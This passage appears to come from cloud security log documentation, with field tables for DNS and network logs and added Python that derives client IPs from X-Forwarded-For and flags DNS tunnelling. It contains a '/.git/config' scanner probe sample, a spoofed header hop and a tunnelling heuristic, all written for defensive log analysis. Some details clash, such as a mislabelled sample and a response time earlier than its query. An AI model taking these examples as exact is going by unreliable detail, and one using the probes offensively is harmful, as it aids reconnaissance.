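    {"src_ip": "203.0.113.9", "http_x_forward_for": "1.1.1.1", "status": 404, "request_uri": "/.git/config"},
    {"src_ip": "10.0.0.7", "http_x_forward_for": "127.0.0.1, 203.0.113.9, 10.0.0.8", "status": 403, "request_uri": "/admin"},
    {"src_ip": "10.0.0.7", "http_x_forward_for": "", "status": 200, "request_uri": "/report"},
    {"src_ip": "10.0.0.7", "http_x_forward_for": "not-an-ip", "status": 404, "request_uri": "/x"},
    {"src_ip": "198.51.100.4", "http_x_forward_for": "192.0.2.55", "status": 200, "request_uri": "/"},
]


def _trusted(ip):
    """True when `ip` parses and belongs to a trusted proxy network."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip(src_ip, xff):
    """Derive the client address from src_ip and the X-Forwarded-For value.

    Returns (ip, source) where source is:
      direct  - src_ip is not a trusted proxy, so the header is ignored entirely;
      xff     - the rightmost header hop that is not a trusted proxy;
      unknown - no header, or only trusted hops, behind a trusted proxy;
      invalid - the candidate hop is not an IP address (fall back to src_ip).
    """
    if not _trusted(src_ip):
        return src_ip, "direct"
    hops = [h.strip() for h in (xff or "").split(",") if h.strip()]
    for hop in reversed(hops):          # walk from the hop closest to us outwards
        if _trusted(hop):
            continue
        try:
            ipaddress.ip_address(hop)
        except ValueError:
            return src_ip, "invalid"
        return hop, "xff"
    return src_ip, "unknown"


def error_counts(records, min_status=400):
    """Count 4xx/5xx responses per derived client; scanners show up at the top."""
    counts = Counter()
    for rec in records:
        if int(rec.get("status", 0)) >= min_status:
            ip, _ = client_ip(rec.get("src_ip"), rec.get("http_x_forward_for"))
            counts[ip] += 1
    return dict(counts)


if __name__ == "__main__":
    for rec in SAMPLE_ACCESS_LOGS:
        print(client_ip(rec["src_ip"], rec["http_x_forward_for"]), rec["status"], rec["request_uri"])
    print(error_counts(SAMPLE_ACCESS_LOGS))
```

The third sample shows why the walk goes right to left: the 127.0.0.1 the client prepended is never reached, because the first untrusted hop seen from the proxy side is the address the trusted proxy actually talked to.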

DNS resolution logs

Field name

Description

Example

additional

Information about additional resource records returned by the DNS server, such as CNAME records, MX records, PTR records, etc.

None

additional_num

Number of additional resource records returned by the DNS server.

0

answer

Answer information returned by the DNS server, indicating the specific resolution result of the queried host. The answer information contains the IP address or other relevant information corresponding to the requested domain name, such as A records, AAAA records, etc.

example.com A IN 52 1.2.XX.XX

answer_num

Number of answer information returned by the DNS server.

1

authority

Authority record information returned by the DNS server, indicating the DNS server responsible for managing and providing resolution for that domain name. Authority records contain information about the DNS servers authorized for the requested domain name, such as NS records.

NS IN 17597

authority_num

Number of authority records returned by the DNS server.

1

client_subnet

Client subnet information of the DNS client, typically carried in the EDNS Client Subnet option of the query.

59.152.XX.XX

dst_ip

Destination IP.

106.55.XX.XX

dst_port

Destination port.

53

net_connect_dir

Direction of DNS request data transmission. Values:

  • in: Requests entering the DNS server.

  • out: Responses sent from the DNS server.

out

qid

Query ID.

13551

query_name

Domain name of the DNS resolution request.

example.com

query_type

Query type of the DNS resolution request.

A

query_datetime

Time of the DNS resolution request.

2024-08-01 08:33:58

rcode

Response code returned by the DNS server, indicating the DNS resolution result.

0

region

Source region ID. Values:

  • 1: Beijing.

  • 2: Qingdao.

  • 3: Hangzhou.

  • 4: Shanghai.

  • 5: Shenzhen.

  • 6: Other.

1

response_datetime

Time when the DNS server returned the response.

2024-08-01 08:31:25

src_ip

Source IP address.

106.11.XX.XX

src_port

Source port.

22

Network session logs

Field name

Description

Example

asset_type

Asset that generated the log. Values:

  • ECS: Elastic Compute Service.

  • SLB: Server Load Balancer.

  • NAT: NAT Gateway.

ECS

dst_ip

Destination IP address.

119.96.XX.XX

dst_port

Destination port.

443

net_connect_dir

Direction of network session data transmission. Fixed value: out.

  • For TCP protocol, it indicates requests initiated from within Alibaba Cloud to outside Alibaba Cloud.

  • For UDP protocol, it does not represent the actual direction of the request, for reference only.

out

l4_proto

Protocol type. Values:

  • tcp

  • udp

tcp

session_time

Start time of the network session.

2024-08-01 08:31:18

src_ip

Source IP address.

121.40.XX.XX

src_port

Source port.

53602

Local DNS logs

Field name

Description

Example

anwser_name

Record name of the DNS answer, representing the domain name associated with the resource record.

example.com

answer_rdata

RDATA (resource data) field of the DNS answer, holding the value of the resolution result.

106.11.XX.XX

answer_ttl

TTL (Time to Live) field of the DNS answer, representing the lifetime of the resolution result, in seconds.

600

answer_type

Record type of the DNS response. The following are common DNS response type values:

  • 1: A record.

  • 2: NS record.

  • 5: CNAME record.

  • 6: SOA record.

  • 10: NULL record.

  • 12: PTR record.

  • 15: MX record.

  • 16: TXT record.

  • 25: KEY record.

  • 28: AAAA record.

  • 33: SRV record.

  • 41: OPT record.

  • 43: DS record.

  • 44: SSHFP record.

  • 45: IPSECKEY record.

  • 46: RRSIG record.

  • 47: NSEC record.

1

dst_ip

Destination IP address (the address the request is sent to). Stored by default as the integer value of the IPv4 address rather than in dotted-quad notation.

323223****

dst_port

Destination port, representing the port to which the request is sent.

53

group_id

Group ID. The same group ID indicates the same DNS request or response.

3

host

Hostname.

hostname

id

Query ID, used to uniquely identify a DNS request or response.

64588

instance_id

Instance ID.

i-2zeg4zldn8zypsfg****

internet_ip

Public IP address of the DNS request or response.

121.40.XX.XX

ip_ttl

TTL value of the IP packet in the DNS request or response.

64

query_name

Domain name being queried.

example.com

query_type

Query type of the DNS resolution request. Values:

  • 1: A record.

  • 2: NS record.

  • 5: CNAME record.

  • 6: SOA record.

  • 10: NULL record.

  • 12: PTR record.

  • 15: MX record.

  • 16: TXT record.

  • 25: KEY record.

  • 28: AAAA record.

  • 33: SRV record.

1

src_ip

IP address that initiated the DNS request or response. Stored by default as the integer value of the IPv4 address rather than in dotted-quad notation.

168427****

src_port

Port that initiated the DNS request or response.

53

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214

time_usecond

Timestamp of the DNS request or response, in microseconds.

590662

tunnel_id

ID of the network tunnel that carried the DNS request or response; it uniquely identifies the tunnel.

514763
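
Two details of this table shape any consumer of Local DNS logs: src_ip and dst_ip are integers rather than dotted quads, and a request and its response are separate rows that have to be joined on the query id. The Python below is an added example, not code from the page or from Security Center: it converts the integer addresses (assumed to be the IPv4 value in network byte order, which is consistent with the masked 323223**** and 168427**** examples above), maps the numeric query and answer type codes to names, joins rows into transactions keyed by instance_id and id, and flags TXT or NULL queries carrying unusually long labels, a common tunnelling indicator. The row layout (one row per answer record, answer fields empty on the query row), the sample rows and the label threshold are assumptions made for this example.

```python
import ipaddress

# Resource record type codes as listed for the query_type / answer_type fields.
RR_TYPE_NAMES = {1: "A", 2: "NS", 5: "CNAME", 6: "SOA", 10: "NULL", 12: "PTR", 15: "MX",
                 16: "TXT", 25: "KEY", 28: "AAAA", 33: "SRV", 41: "OPT", 43: "DS",
                 44: "SSHFP", 45: "IPSECKEY", 46: "RRSIG", 47: "NSEC"}

# Constructed sample rows (not real log data). Assumed layout: the query row has empty
# answer_* fields; each answer record of the response is its own row with the same id.
SAMPLE_ROWS = [
    {"instance_id": "i-a", "id": 64588, "group_id": 3, "query_name": "example.com", "query_type": 1,
     "answer_type": "", "answer_rdata": "", "answer_ttl": "",
     "src_ip": 168430090, "src_port": 51234, "dst_ip": 3232235777, "dst_port": 53},
    {"instance_id": "i-a", "id": 64588, "group_id": 4, "query_name": "example.com", "query_type": 1,
     "answer_type": 1, "answer_rdata": "203.0.113.10", "answer_ttl": 600,
     "src_ip": 3232235777, "src_port": 53, "dst_ip": 168430090, "dst_port": 51234},
    {"instance_id": "i-a", "id": 64588, "group_id": 4, "query_name": "example.com", "query_type": 1,
     "answer_type": 1, "answer_rdata": "203.0.113.11", "answer_ttl": 600,
     "src_ip": 3232235777, "src_port": 53, "dst_ip": 168430090, "dst_port": 51234},
    {"instance_id": "i-a", "id": 7, "group_id": 9,
     "query_name": "aGVsbG8gd29ybGQgdGhpcyBpcyBhIGxvbmcgbGFiZWw.t.example.net", "query_type": 16,
     "answer_type": "", "answer_rdata": "", "answer_ttl": "",
     "src_ip": 168430090, "src_port": 40001, "dst_ip": 3232235777, "dst_port": 53},
]


def int_to_ip(value):
    """Convert the integer form used by src_ip/dst_ip to dotted quad (None if not a valid IPv4 value)."""
    try:
        return str(ipaddress.IPv4Address(int(value)))
    except (TypeError, ValueError):   # AddressValueError is a ValueError subclass
        return None


def rr_type_name(code):
    """Map a numeric record type to its mnemonic; unknown codes use the RFC 3597 TYPEnnn form."""
    code = int(code)
    return RR_TYPE_NAMES.get(code, f"TYPE{code}")


def correlate(rows):
    """Join query and answer rows into transactions keyed by (instance_id, id).

    Caveat: DNS ids are 16-bit and reused, so on a busy host add a time window to the key.
    """
    txns = {}
    for row in rows:
        key = (row["instance_id"], int(row["id"]))
        txn = txns.setdefault(key, {"qname": row["query_name"], "qtype": rr_type_name(row["query_type"]),
                                    "client": None, "resolver": None, "answers": []})
        if row.get("answer_type") in ("", None):          # query row: client -> resolver
            txn["client"], txn["resolver"] = int_to_ip(row["src_ip"]), int_to_ip(row["dst_ip"])
        else:                                             # answer row: resolver -> client
            txn["client"] = txn["client"] or int_to_ip(row["dst_ip"])
            txn["resolver"] = txn["resolver"] or int_to_ip(row["src_ip"])
            txn["answers"].append((rr_type_name(row["answer_type"]), row["answer_rdata"], int(row["answer_ttl"])))
    return txns


def suspicious_queries(txns, max_label=40):
    """Flag TXT/NULL queries carrying a label longer than `max_label` (assumed tunnelling heuristic)."""
    flagged = []
    for txn in txns.values():
        longest = max(len(label) for label in txn["qname"].split("."))
        if txn["qtype"] in ("TXT", "NULL") and longest > max_label:
            flagged.append((txn["qname"], f"{txn['qtype']} query with a {longest}-character label"))
    return flagged


if __name__ == "__main__":
    transactions = correlate(SAMPLE_ROWS)
    for key, txn in transactions.items():
        print(key, txn)
    print(suspicious_queries(transactions))
```

The fourth sample row has no response rows at all, which is itself typical of tunnelling traffic that only needs the query to reach the attacker's authoritative server; the heuristic therefore keys on the query, not on the answer.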
